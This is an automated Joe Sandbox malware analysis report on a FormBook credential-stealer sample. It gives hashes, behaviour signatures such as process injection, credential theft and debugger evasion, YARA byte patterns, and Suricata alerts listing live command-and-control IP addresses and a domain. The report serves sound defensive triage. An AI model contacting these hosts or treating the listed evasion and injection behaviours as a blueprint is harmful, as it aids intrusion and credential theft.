Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rP0n___87004354.exe

Overview

General Information

Sample name:rP0n___87004354.exe
Analysis ID:1518123
MD5:c20955bf63ac83dcd469613d4b10504a
SHA1:04613896a3d157769897706154223322988d17c1
SHA256:b90c861586483b929fd0e015213742bad507395c206a9b4c338e28c075839854
Tags:exeuser-Porcupine
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • rP0n___87004354.exe (PID: 980 cmdline: "C:\Users\user\Desktop\rP0n___87004354.exe" MD5: C20955BF63AC83DCD469613D4B10504A)
    • svchost.exe (PID: 4904 cmdline: "C:\Users\user\Desktop\rP0n___87004354.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • FrywuFHvnDbLo.exe (PID: 1060 cmdline: "C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mstsc.exe (PID: 2084 cmdline: "C:\Windows\SysWOW64\mstsc.exe" MD5: EA4A02BE14C405327EEBA8D9AD2BD42C)
          • FrywuFHvnDbLo.exe (PID: 3368 cmdline: "C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4956 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1812489277.0000000002490000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.1812489277.0000000002490000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2f243:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x173d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.3548998319.0000000005260000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.3548998319.0000000005260000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x41a76:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x29c05:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000001.00000002.1817351860.0000000003250000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.2490000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.2490000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e443:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x165d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.2490000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.2490000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f243:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x173d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\rP0n___87004354.exe", CommandLine: "C:\Users\user\Desktop\rP0n___87004354.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rP0n___87004354.exe", ParentImage: C:\Users\user\Desktop\rP0n___87004354.exe, ParentProcessId: 980, ParentProcessName: rP0n___87004354.exe, ProcessCommandLine: "C:\Users\user\Desktop\rP0n___87004354.exe", ProcessId: 4904, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\rP0n___87004354.exe", CommandLine: "C:\Users\user\Desktop\rP0n___87004354.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rP0n___87004354.exe", ParentImage: C:\Users\user\Desktop\rP0n___87004354.exe, ParentProcessId: 980, ParentProcessName: rP0n___87004354.exe, ProcessCommandLine: "C:\Users\user\Desktop\rP0n___87004354.exe", ProcessId: 4904, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T12:46:29.988778+020020507451Malware Command and Control Activity Detected192.168.2.44973681.88.63.4680TCP
            2024-09-25T12:46:54.950374+020020507451Malware Command and Control Activity Detected192.168.2.449740217.70.184.5080TCP
            2024-09-25T12:47:08.338133+020020507451Malware Command and Control Activity Detected192.168.2.449745172.96.187.6080TCP
            2024-09-25T12:47:21.516611+020020507451Malware Command and Control Activity Detected192.168.2.4497493.33.130.19080TCP
            2024-09-25T12:47:34.943685+020020507451Malware Command and Control Activity Detected192.168.2.44975367.223.117.18980TCP
            2024-09-25T12:48:09.394601+020020507451Malware Command and Control Activity Detected192.168.2.449757103.248.137.20980TCP
            2024-09-25T12:48:30.640903+020020507451Malware Command and Control Activity Detected192.168.2.4497613.33.130.19080TCP
            2024-09-25T12:48:43.979967+020020507451Malware Command and Control Activity Detected192.168.2.4497653.33.130.19080TCP
            2024-09-25T12:48:57.629655+020020507451Malware Command and Control Activity Detected192.168.2.44976985.153.138.11380TCP
            2024-09-25T12:49:11.931245+020020507451Malware Command and Control Activity Detected192.168.2.449773104.21.11.3180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T12:46:29.988778+020028554651A Network Trojan was detected192.168.2.44973681.88.63.4680TCP
            2024-09-25T12:46:54.950374+020028554651A Network Trojan was detected192.168.2.449740217.70.184.5080TCP
            2024-09-25T12:47:08.338133+020028554651A Network Trojan was detected192.168.2.449745172.96.187.6080TCP
            2024-09-25T12:47:21.516611+020028554651A Network Trojan was detected192.168.2.4497493.33.130.19080TCP
            2024-09-25T12:47:34.943685+020028554651A Network Trojan was detected192.168.2.44975367.223.117.18980TCP
            2024-09-25T12:48:09.394601+020028554651A Network Trojan was detected192.168.2.449757103.248.137.20980TCP
            2024-09-25T12:48:30.640903+020028554651A Network Trojan was detected192.168.2.4497613.33.130.19080TCP
            2024-09-25T12:48:43.979967+020028554651A Network Trojan was detected192.168.2.4497653.33.130.19080TCP
            2024-09-25T12:48:57.629655+020028554651A Network Trojan was detected192.168.2.44976985.153.138.11380TCP
            2024-09-25T12:49:11.931245+020028554651A Network Trojan was detected192.168.2.449773104.21.11.3180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T12:46:46.637813+020028554641A Network Trojan was detected192.168.2.449737217.70.184.5080TCP
            2024-09-25T12:46:49.260057+020028554641A Network Trojan was detected192.168.2.449738217.70.184.5080TCP
            2024-09-25T12:46:51.747916+020028554641A Network Trojan was detected192.168.2.449739217.70.184.5080TCP
            2024-09-25T12:47:00.696604+020028554641A Network Trojan was detected192.168.2.449742172.96.187.6080TCP
            2024-09-25T12:47:03.240302+020028554641A Network Trojan was detected192.168.2.449743172.96.187.6080TCP
            2024-09-25T12:47:05.798338+020028554641A Network Trojan was detected192.168.2.449744172.96.187.6080TCP
            2024-09-25T12:47:13.838742+020028554641A Network Trojan was detected192.168.2.4497463.33.130.19080TCP
            2024-09-25T12:47:17.316782+020028554641A Network Trojan was detected192.168.2.4497473.33.130.19080TCP
            2024-09-25T12:47:20.010252+020028554641A Network Trojan was detected192.168.2.4497483.33.130.19080TCP
            2024-09-25T12:47:27.411768+020028554641A Network Trojan was detected192.168.2.44975067.223.117.18980TCP
            2024-09-25T12:47:29.890026+020028554641A Network Trojan was detected192.168.2.44975167.223.117.18980TCP
            2024-09-25T12:47:32.412218+020028554641A Network Trojan was detected192.168.2.44975267.223.117.18980TCP
            2024-09-25T12:47:41.807158+020028554641A Network Trojan was detected192.168.2.449754103.248.137.20980TCP
            2024-09-25T12:47:44.354366+020028554641A Network Trojan was detected192.168.2.449755103.248.137.20980TCP
            2024-09-25T12:47:46.904785+020028554641A Network Trojan was detected192.168.2.449756103.248.137.20980TCP
            2024-09-25T12:48:22.972850+020028554641A Network Trojan was detected192.168.2.4497583.33.130.19080TCP
            2024-09-25T12:48:25.532954+020028554641A Network Trojan was detected192.168.2.4497593.33.130.19080TCP
            2024-09-25T12:48:28.066243+020028554641A Network Trojan was detected192.168.2.4497603.33.130.19080TCP
            2024-09-25T12:48:37.387909+020028554641A Network Trojan was detected192.168.2.4497623.33.130.19080TCP
            2024-09-25T12:48:39.932241+020028554641A Network Trojan was detected192.168.2.4497633.33.130.19080TCP
            2024-09-25T12:48:41.416916+020028554641A Network Trojan was detected192.168.2.4497643.33.130.19080TCP
            2024-09-25T12:48:49.969654+020028554641A Network Trojan was detected192.168.2.44976685.153.138.11380TCP
            2024-09-25T12:48:52.523896+020028554641A Network Trojan was detected192.168.2.44976785.153.138.11380TCP
            2024-09-25T12:48:55.215174+020028554641A Network Trojan was detected192.168.2.44976885.153.138.11380TCP
            2024-09-25T12:49:03.768976+020028554641A Network Trojan was detected192.168.2.449770104.21.11.3180TCP
            2024-09-25T12:49:06.298093+020028554641A Network Trojan was detected192.168.2.449771104.21.11.3180TCP
            2024-09-25T12:49:09.089476+020028554641A Network Trojan was detected192.168.2.449772104.21.11.3180TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: rP0n___87004354.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: rP0n___87004354.exeReversingLabs: Detection: 73%
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2490000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1812489277.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3548998319.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1817351860.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3547541019.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1817399152.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3546547268.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3547479377.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3547465093.00000000055B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: rP0n___87004354.exeJoe Sandbox ML: detected
            Source: rP0n___87004354.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FrywuFHvnDbLo.exe, 00000002.00000000.1729011183.0000000000DBE000.00000002.00000001.01000000.00000004.sdmp, FrywuFHvnDbLo.exe, 00000005.00000000.1882941520.0000000000DBE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: rP0n___87004354.exe, 00000000.00000003.1700289327.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, rP0n___87004354.exe, 00000000.00000003.1699565720.0000000004200000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1713196768.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1816942530.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1710437251.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1816942530.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1819913903.000000000436A000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.3547780218.0000000004510000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.3547780218.00000000046AE000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1818285042.00000000041B2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: rP0n___87004354.exe, 00000000.00000003.1700289327.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, rP0n___87004354.exe, 00000000.00000003.1699565720.0000000004200000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1713196768.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1816942530.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1710437251.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1816942530.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000003.00000003.1819913903.000000000436A000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.3547780218.0000000004510000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.3547780218.00000000046AE000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1818285042.00000000041B2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mstsc.pdbGCTL source: svchost.exe, 00000001.00000003.1781073080.0000000008C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1781207304.0000000008E00000.00000004.00000020.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000003.1763185053.0000000006CD0000.00000004.00000001.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000003.1764554247.0000000006E10000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: mstsc.exe, 00000003.00000002.3548096253.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.3546768186.0000000000582000.00000004.00000020.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000000.1883295228.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2104098329.000000002E32C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: mstsc.pdb source: svchost.exe, 00000001.00000003.1781073080.0000000008C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1781207304.0000000008E00000.00000004.00000020.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000003.1763185053.0000000006CD0000.00000004.00000001.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000003.1764554247.0000000006E10000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: mstsc.exe, 00000003.00000002.3548096253.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.3546768186.0000000000582000.00000004.00000020.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000000.1883295228.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2104098329.000000002E32C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007D449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_007D449B
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DC75D FindFirstFileW,FindClose,0_2_007DC75D
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_007DC7E8
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007DF021
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007DF17E
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007DF47F
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007D3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007D3833
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007D3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007D3B56
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007DBD48
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0017C460 FindFirstFileW,FindNextFileW,FindClose,3_2_0017C460
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then xor eax, eax3_2_00169C00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop edi3_2_0016E012
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then mov ebx, 00000004h3_2_042A04DE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49773 -> 104.21.11.31:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49773 -> 104.21.11.31:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49749 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 103.248.137.209:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49749 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 81.88.63.46:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 81.88.63.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 172.96.187.60:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 85.153.138.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 103.248.137.209:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 103.248.137.209:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49740 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49740 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 104.21.11.31:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 172.96.187.60:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 85.153.138.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 172.96.187.60:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49757 -> 103.248.137.209:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49753 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49757 -> 103.248.137.209:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49753 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49765 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49765 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49769 -> 85.153.138.113:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49769 -> 85.153.138.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 104.21.11.31:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 85.153.138.113:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49761 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49761 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49745 -> 172.96.187.60:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49745 -> 172.96.187.60:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 104.21.11.31:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.heldhold.xyz
            Source: Joe Sandbox ViewIP Address: 67.223.117.189 67.223.117.189
